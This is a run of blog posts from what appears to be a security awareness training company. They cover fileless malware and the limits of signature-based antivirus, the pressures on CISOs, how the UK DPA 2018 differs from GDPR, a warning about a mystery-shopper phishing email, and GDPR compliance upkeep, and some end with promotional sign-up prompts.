By the mid-2000s antivirus software had reached mythical status in the history of computing. It was an unusual person who did not have antivirus software installed on their computer, especially if running a Microsoft Windows machine.

Then something happened – in 2014, the Vice President of Symantec, made an announcement – antivirus software was “dead”. He went on to explain that antivirus software was only catching about 45% of malware threats leaving the other 55% free to wreak havoc on our IT infrastructures. A scary announcement like that, from an antivirus vendor, sent shock waves through the industry.

So, why was this? What changed? How was this new pesky malware evading capture?

How Antivirus Software Met Its Match

You may have noticed that there is a lot of talk about antibiotic resistance in the world, bacteria evolving resistance. This is nicely analogous to the fall of traditional antivirus software. Like its bacterial equivalent, malware is updated by the programmers who create it, to thwart its attacker – the antivirus scanner.

Traditional antivirus software uses something called a ‘signature’ to detect malware activity. This signature is a few bytes within the code that is unique to that malware. Traditional antivirus scans would look for this signature, if they found it, they used tools to isolate the find and quarantine it in your system, further destroying it, as required.

Another technique used by antivirus software is called “heuristic detection”. This technique uses rules that look for specific types of activity, like command methods to install software; hit a threshold of suspicious activity and a virus alert appears.

But life is never simple is it. Cybercriminals were able to update their software to obfuscate the very signatures that made malware visible to antivirus scanners.

Damn their cunning ways.

The Perfect Cybercrime – Fileless Malware

Fileless malware – the clue is in the name, is the enemy of traditional antivirus software because it does not leave any traces of itself on your hard drive after execution of the malware – it is only ever resident in computer memory (RAM). It is like the perfect crime; the trick being to leave no evidence for the ‘cops’ to find.

Fileless attacks have the same end result as their file cousins, malware infection to control, steal, and expose. They use the same processes too – a phishing email link may take you to a site that then executes a fileless attack. Security solutions that need a signature or a set of behavioural rules to spot malware are of no any use in fileless-attacks. So, a fileless malware attack will go under the radar of any organisation using traditional antivirus software.

Because of this sneaky feature, fileless malware attacks were up by 94% in 2018 according to SentinelOne. And The Ponemon Institute identified a similar scenario predicting 35% of cyber-attacks in 2018 having a fileless basis.

Antivirus Software is Dead, Long Live Antivirus Software

But cybercriminals are not the only ones who can evolve. Antivirus vendors have seen the fileless bet and raise the cybercriminal an intelligent solution. There are now solutions that specifically look for fileless attack smoke signals. I have identified a few of the vendors who specialise in this area below, but most use a principle of automated monitoring across a network which looks for patterns of behaviour associated with these types of attacks.

And, of course, malware attacks are not always fileless. So modern antivirus/anti-malware solutions are still an important part of your cybersecurity measures – as they also use traditional signature and heuristic-based scans.

Layering Technology and Humans to Stop Fileless Attacks in Their Invisible Tracks

Having software that monitors your network is only part of the solution of modern-day cyber-warfare. The use of technical security measures is only one part of a wider scope of protection. Because many cyber-threats have an origin in social engineering by taking advantage of human behaviour, they need a human-centred approach too.

Many cyber-attacks, including those that are fileless, need a human being to initiate the sequence of events that lead to malware infection. Phishing is the perfect and ubiquitous example. Phishing relies on a human operator to click a link or download a document. The infection followed by fileless or traditional methods of code execution. It is the perfect storm of human and technology being used to exploit your organisation.

Security awareness training is the most effective way of stopping the early part of the process of malware infection. Security awareness training is your first layer of protection against cyber-attacks including malware infection – your staff are like your filter before anything even gets to the point of being caught by antivirus software.

Five Examples of Endpoint Security Vendors

Once you have your staff ready and cyber-safe, you can look at the right vendor to provide your next layer of defence – the antivirus/anti-malware solution often included in more comprehensive ‘endpoint’ security solutions. There are lots of offerings in this area, for both home and business use; we’ve only shown a few here to whet your appetite:

Malwarebytes  – Endpoint Protection and Response: Malwarebytes offer solutions for home and business. Their home anti-malware product installs on a machine and acts like traditional antivirus solution by performing regular scans for known viruses and malware. It also prevents ransomware infection, and exploit kits running if you go to a spoof website. They have a more comprehensive kit that brings several security options together under one agent.

Trend Micro – Apex One: An endpoint solution that uses a number of techniques to spot malicious behaviour. This is based on collation of threat knowledge. It helps to prevent fileless attacks as well as ransomware. It has lots of bolt-on pieces to add more features.

BitDefender – Antivirus Plus: The Home edition offers advanced antivirus features and ransomware prevention. For full features you have to upgrade to the Bitdefender, more comprehensive, ‘Security Suite’.

Kaspersky – Antivirus: Uses scans to locate virus infection and quarantine any found files. Protects against ransomware and crypto-mining bots.

Panda Labs – Antivirus: Described as “next gen” antivirus software. It uses continuous monitoring based on behavioural intelligence to spot fileless attacks as well as more traditional malware infection.

A Virus Free Future?

It is unlikely that malware will disappear. It is a highly effective way to take control of IT resources, steal login credentials, expose data, and cause outages.

So, we have to work out ways to keep our organisation safe from this ever-present threat. Antivirus solutions have evolved to stay in line with the changing nature of malware threats, but they are not a solution on their own. We have to put layers of protection in place to thwart the sophisticated methods used to circumvent technical measures.

Making sure that our staff are security aware is the most fundamental thing we can do to protect our company against a cyber-attack. Our staff are our foot soldiers. Well-trained, many of the ways into our network will be closed off.

Want to learn more about empowering your employees’ security defences?  Why not sign up for a free demo and find out how we’re already helping organisations just like yours.

Share this:

If you make it to the heady heights of Chief Information Security Office (CISO) in your career, you are doing pretty well. But CISO’s haven’t always been around; information security used to be somebody else’s problem, and sometimes, still is.

In the 90s, security was pretty much an afterthought for anyone other than a dedicated security professional. This, of course, was before the Internet and mobile computing took off.

Back in 2016, IBM put out a statistic stating that 90% of the world’s data had been generated in the previous 2 years. And data just continues to burst out of every IoT device, online transaction, and mobile phone communication.

This makes the job of the person heading up information security, complex. The CISO, chief of keeping our data safe, has a big job on their hands. They have the multi-pronged task of managing the day-to-day IT and data security threats, as well as managing and maintaining the ever-changing compliance requirements of the business. And, all of this within the shifting sands of the cybersecurity landscape as data explodes.

In a report by the Ponemon Institute and commissioned by F5, which looked at the role of CISO, they found that 60% of CISO’s place cybersecurity as a business priority.

So, what sort of things makes the average CISO stay awake at night?

Budgets, or lack thereof

Budgeting for a solid and timely response to the threat of cybersecurity can be tricky. Security is often seen as non-core to business, so the area may end up with the budget equivalent of crumbs when year-end comes around. Of course, the CISO is left with the job of convincing the C-Level and board members that security must be taken seriously. However, the cybercrime statistics can do a pretty good job in helping to convince the board your department needs proper funding. In 2018, more than 2.8 billion data records were exposed. In the same year, 40 percent of small businesses were victims of a data breach; a single incident resulted in a 20 percent loss in customer base.

Figures like this can then be used to show the cost to a business, both as a reputation and financial consideration to create a case for a realistic budget.

The hunt for skilled staff

A CISO is not an island. They need skilled people to work alongside them. To take their security strategies and implement the measures across the company. These skilled staff are not just security professionals. There is also a need for people who understand compliance and training. In a survey by McAfee into shortages of skilled staff in the security industry, they found that 82% of those surveyed reported a shortage of cybersecurity skills. This tallies with a recent (ISC)2 report which states there will be a gap of 1.8 million jobs in cybersecurity by 2022.

Outsourcing is an option here, but again, this ties in with budgets.

The old compliance chestnut

Data protection and privacy regulations are there to protect our company and our customers. However, they can be hard work to implement.  This is especially true when you have more than one type of regulation to comply with. For example, if you process financial information then you will need to comply with at least PCI-DSS, but also, likely, GDPR and possibly also some variants within the UK’s DPA 2018. The array of regulatory frameworks around data protection can take your breath away.

Compliance is a company wide issue that falls on the shoulders of the CISO and their team. But a budget has to be set to help meet the stringent requirements of modern regulations. Again, the financial bottom line can help with this, as regulations like GDPR and DPA 2018 set massive fines for non-compliance.

Building a Culture of Security

One thing that helps with the general job of the CISO is having everyone on board. The old saying of “There is no i in team” is so true. Bringing the entire organisation together under the banner of a “Culture of Security” makes the CISO job a little bit easier. Why is this? Security awareness training is the foundation stone of this Culture of Security. If you use security awareness training to teach all staff about what cybersecurity is, how to spot tell-tale signs of security issues, and how to act in a security preserving manner, many of the challenges of protecting the company will be reduced because of the old adage “many hands make light work”.

The changing security landscape

In life, there are certain things that never change, but cybercrime is not one of them. If you look at the malware numbers from AV-Test, they show increasing malware types, year-on-year, since 2010. And the types of threats change too. In 2016, ransomware was one of the biggest threats; in 2017, cryptojacking had risen in rank with an 8500% increasein attacks, with the U.K.’s National Cyber Security Centre placing it as a “significant’ threat to UK business.

A CISO has their work cut out as they have to navigate this ever-changing landscape to ensure the company has the right precautions in place. They need to do this in an environment of support. A CISO and their team need to be visible and not seen as the “backroom boys and girls”. When a company spends the time to build a Culture of Security, they also embrace the idea that the whole company is responsible for being cyber-safe. In this situation, the ever-changing cybersecurity landscape is less of a concern as the CISO has everyone watching the company’s back. Of course, this means that security awareness training is not a one-off exercise. Keeping on top of security is not just the CISO’s responsibility, it is in the interest of the entire company.

Giving the CISO a Helping Hand

It can be lonely at the top, and the best way to help cybercriminals is to isolate people. The people in our organisations are our best defence against cyber-threats. The CISO is the person most well-placed to set in motion the wheels of security awareness training to pull the company together in defending against cyber-attacks.

And a final word from ClubCISO. In a survey, they asked CISO’s how strongly they agree with the question “I love my job”.

28% said they “strongly agreed”. Hopefully, with the help of colleagues to make this most complex of jobs easier, this number will increase.

Source: ClubCISO IT Security Maturity Report. All content © ClubCISO/Company85

 

Share this:

Over the last couple of years, compliance has become a bane of our business lives. Like a spectre hanging over our heads, the General Data Protection Regulation (GDPR) pulled at our time and resources. The regulation was finally enacted on May 25, 2018. But in the UK, we also have the Data Protection Act (DPA) hanging around our necks.

The DPA originally entered our working lives back in 1995. It was updated in 1998 to reflect the GDPR predecessor the EU’s Data Protection Directive (DPD) 1995 (Directive 95/46/EC). The DPA, like the EU’s DPD, are laws that determine how we, as a business, protect personal data.

Jump forward to 2018 and all hell breaks loose with the update to the EU’s DPD –  the GDPR. And, along with it, the UK’s DPA becomes the DPA 2018.

In this article, I’ll take a look at the two acts and where they coincide or diverge. Hopefully, this will shine a light on them, so you don’t replicate work or miss vital requirement differences.

What the DPA 2018 and GDPR Have in Common

In general, the DPA 2018 and the GDPR are laws that are there to protect personal data. For the most part, the two regulations are common. They both defend the data subject rights as outlined in the GDPR – these data subjects rights ensure the owners of the personal data, aka your customers, employees, etc. have rights to control the data they share with you.

One thing worth noting, the DPA, previously, had lower fine thresholds. This is demonstrated in fines in the region of £385,000 for Uber when they failed to protect personal data during the 2016 breach. Now, the DPA has embraced the much larger fine levels of the GDPR. These fines being up to 4% of gross global revenue or 20 million euros whichever is higher.

Where the DPA 2018 and GDPR Diverge

The DPA 2018, moves away from the GDPR in certain areas. The DPA 2018 is split into seven individual parts; according to the Information Commissioner’s Office (ICO) the areas of divergence are in parts 2,3, and 4:

Part 2- Chapter 2: This deals in detail with the GDPR provisions.

This part adds detail to the GDPR requirements and extends them to meet UK needs.

  • This section sets out in clear terms the meaning of ‘controller’, ‘public authority’ and ‘public body’.
  • Consent for children is set at 16-years in the GDPR, the DPA 2018 sets the age limit at 13-years.
  • Special categories of data have more stringent protection under the GDPR. The DPA 2018 is updated to apply more granularity and extend the circumstances they can be processed. For more details see section 11 of part 2 of the act.
  • Fee limits are placed on those applied to data controllers
  • Safeguards for automated decision making are extended, the act explaining what a “significant decision” entails.
  • Credit file agencies are offered a limit to the extent to which the EU GDPR’s right of access applies
  • Accreditation of certification is limited to the Commissioner or the national accreditation body, which, in the UK, is UKAS.
  • This section is particularly interesting – “Power to make further exemptions etc by regulations” it builds in a provision to make exemptions to various articles of the GDPR, including several data subject rights such as the right to erasure and right to access.
  • Safeguards for using data for research and archiving
  • Transferring data to third countries is also extended, especially if it is deemed to be in the public interest.

Part 2- Chapter 3: Offer General Processing, also termed “The Applied GDPR”

This extends the GDPR to cover certain unusual or rare circumstances. Schedule 6 of the DPA 2018 goes into further details.

The main extensions are in the areas:

  • automated or structured processing of personal data for circumstances where the data:
    • Is outside of EU law
    • falls within the scope of Article 2(2)(b) of the GDPR (common foreign and security policy activities)
  • Data that is personal and unstructured and held by an FOI public authority

Part 3 – Law enforcement data processing

This chapter applies specifically to law enforcement agencies. If you are wondering what this means, specifically, here is the section pulled out which defines law enforcement in this context:

““the law enforcement purposes” are the purposes of the prevention, investigation, detection or prosecution of criminal offences or the execution of criminal penalties, including the safeguarding against and the prevention of threats to public security.”

The major difference between this section and the GDPR is that the requirement to process personal data transparently has been removed (to prevent any prejudice in a criminal investigation).

Part 4 – The “Intelligence Services” section

This section applies to three identified intelligence agencies, namely the Security Service (MI5), the Secret Intelligence Service (MI6) and GCHQ.

This section reflects the GDPR data subject rights. These include, right to erasure, access, rectification, etc. The regime for the three covered entities is slightly modified from the GDPR in wording around ‘security measures’ as opposed to ‘technical and organisational measures’.

And Finally, the Dreaded B Word

I have to bring it up, sorry. I don’t want to, but I must. Brexit. How does leaving the EU impact the UK’s data protection laws?

The DPA 2018 is a UK law and so should not be affected by leaving the EU unless parliament determines it will be. And let’s face it, who knows the answer to that one.

Ultimately, however, the GDPR is a very wide-reaching directive that impinges on state laws. If we leave the EU, your organisation may still be held to account by the GDPR if you process the data of a citizen in an EU state.

 

 

 

Share this:

When we think about the concept of a ‘mystery shopper’ we often have an image of going into shops or restaurants and getting goodies for free and being paid for the pleasure. There is an air of excitement about being a mystery shopper and people do genuinely work in the area of customer satisfaction research, checking out customer experiences. This week’s scam offers a lucrative position as a mystery shopper. I have received a number of these scams in the last few weeks, all offering financial rewards for shopping – all I have to do is provide some personal data.

This week’s mystery shopper scam has some stark differences when compared with some of the other scams I’ve talked about over the last few months:

mystery shopper email scam

What is different from the other scam emails?

  1. They are NOT based on a well-known brand. The emails are generic and use phrases like ‘Mystery Shopper’ to entice you in.
  2. The scam emails do not have any links to click on; instead, they require a reply action to send them your personal data.

What they do have in common:

  1. They use a financial reward of several hundred dollars (the email is obviously meant for a U.S. audience, hence the USD offer). However, watch out for similar GBP-based scam emails.
  2. They ask you to give them your personal data (phishing) to apply for the job of mystery shopper:

—-Name:

—-Email:

—-Street:

—-City:

—-State:

—-ZIP Code:

—-Phone:

—-Gender:

  1. The language used in the email body was poorly executed. For example,

18 Years Can speak local language well

No experience needed like shopping”

This scam is not the most sophisticated scam email I have seen. However, mystery shopper scams work, and they have been operating in various guises for many years. If you reply to a mystery shopper scam and send over your personal data, that data will be used to commit fraud in your name. There were over 1 million cases of fraudulent financial transactions in the UK in the first half of 2018 with £358 million in losses. If you hand over your personal data to scammers you could end up as yet another fraud statistic. 

Needless to say, never, ever send personal data such as name, address, age, etc. to any source unless you are thoroughly happy with their legitimacy.

If you do want to become a mystery shopper, do your research first.

If you receive a mystery shopper scam email and are concerned, you can report it to Action Fraud, The National Fraud and Cyber Crime Reporting Centre.

Example of a Mystery Shopper Scam email

mystery shopper email scam

 

Why not help your colleagues stay safe and send them this little reminder. Feel free to edit, copy/paste the advice below:

The Mystery Shopper Scam

Look out for a suspicious email which offers financial rewards for becoming a mystery shopper.

The email will ask for various personal details, including name, address, age, etc.

The email is a scam and sending any personal data to the scammer will likely result in your details being used to commit fraud.

If you receive an email like this and are concerned, you can report it to Action Fraud, The National Fraud and Cyber Crime Reporting Centre.

Don’t forget to share this with your colleagues and friends and help them stay safe.

Let’s keeping breaking scams!

 

Share this:

The General Data Protection Regulation (GDPR) came into our lives like a tornado. It swept through our business processes and spat us out. Well, that is certainly how it felt at the time.

Now, almost a year on, where do we stand?

Has your organisation recovered enough to take a breather or are you still wondering what a DPIA is and do you really need to take consent from customers you’ve had for ten years?

By February of this year, over 59,000 organisations had made a data breach notification to their local authorities. Around 10,600 of those were from UK companies. The GDPR is not going away and we have to make sure we deal with it efficiently and effectively.

With this in mind, as we move into the second year of being under the GDPR hood, what sort of things do we need to re-address or keep an eye on?

Keeping Up with the GDPR

There are a few housekeeping points you need to keep on top of to maintain compliance with GDPR requirements. The main ones include:

GDPR requirements refresher course

It is always useful to refresh your knowledge around what the requirements of GDPR actually are. Even if you have a dedicated Data Protection Officer (DPO) who has the job of keeping your organisation in line with the GDPR, your staff may have forgotten what it is all about. Staff GDPR refresher course training helps to keep your staff focused on the importance of data privacy. These refresher courses are particularly important for staff who handle data, such as HR, marketing, IT, and sales.

Reviewing your processes and suppliers

By now you will have been through the internal review of your processes which are impacted by GDPR. But a ‘good once over’ often misses important areas. And, things change over time. You may have updated your privacy policy for GDPR but have you, since then, changed the data you collect, or the company that processes it for you?

Any update that fundamentally changes the data processing of your organisation needs to be checked for GDPR compliance. To recap:

  • Review your data processing procedure
  • Check your data capture and any new data brought under your control. This includes any special category data under the GDPR which covers areas such as trade union membership, biometrics, health data.
  • Review your consent process a year on – did you capture the consents you were supposed to? If you manage consents using a basis of ‘legitimate interest’ have you carried out a Legitimate Interest Assessment (LIA) to show compliance?
  • Have you changed suppliers -added or removed vendors from your supply list? If so, make sure you have covered the GDPR requirements to ensure they process any data you collect within the expectations of the regulation

Updating policies

A security policy is not a static entity. It is only as good as the security and data protection landscape that it represents. Review your security policy to see if you need to update any areas, especially around data protection regulations like GDPR. The review you do that looks at processes, collection, and suppliers, will feed into this task.

Where you do find gaps in your policy, plug them with updated information and procedures. And, don’t forget to make sure that all staff, from C-Level down, know the policy has been updated. You may also require policy training to help with implementation of any new processes.

Review and update your DPIA

A Data Privacy Impact Assessment (DPIA) is a process carried out by a suitably qualified individual or firm to look at your processes and procedures to see if data privacy is impacted. The assessment will look to solutions to solve any issues the DPIA finds. A DPIA is a requirement of the UK’s Data Protection Act (DPA) and GDPR. The UK’s Information Commissioner’s Office (ICO) have guidance on how to perform a DPIA.

Keep on top of cyber threats

Being aware of security threats is an important aspect of modern business. The cyber-threat landscape is an ever-changing place as cybercriminals continuously up their game to keep us on our toes. Data privacy is an aspect of data security that is often impacted by cybercrime. Use regular security awareness training, such as online training videos, to keep staff aware of the daily risks to personal data of using email, mobile devices, etc. An aware staff member is a safer and more regulation complaint staff member.

Review your approach to compliance

Compliance, including regulations that involve data protection, has become an everyday part of business life. But the compliance landscape, including the approach to policing and enforcing regulations, can change. This can, in turn, affect how you approach regulatory compliance in your organisation. Keep a watchful eye on the ICO’s Regulatory Action Policy document which sets out what powers the ICO has and how they apply them. Understanding this may help you to adjust the way you approach your own compliance requirements.

The Carousel of Compliance

All of the above, demonstrates that keeping in the bounds of regulatory compliance and ensuring you meet the requirements of GDPR is not a one-off task. Regulatory frameworks on privacy and security matters are there to reflect the needs of our digital society. They themselves are not static – the GDPR is a result of the growing use of personal data in a connected world. The best way forward to minimise the upheaval of compliance is to get into a routine of regular review. Once you have this in place and done it a couple of times it will become easier. In the end, with fines as high as 4% of gross revenue or 20 million euros whichever is higher, getting your house in order and keeping it there is a worthwhile job.

Looking to tick one job off the GDPR to-do list?  Why not check out our GDPR Awareness training or sign up for a free demo of our wider security awareness training services.

 

 

 

 

 

Share this: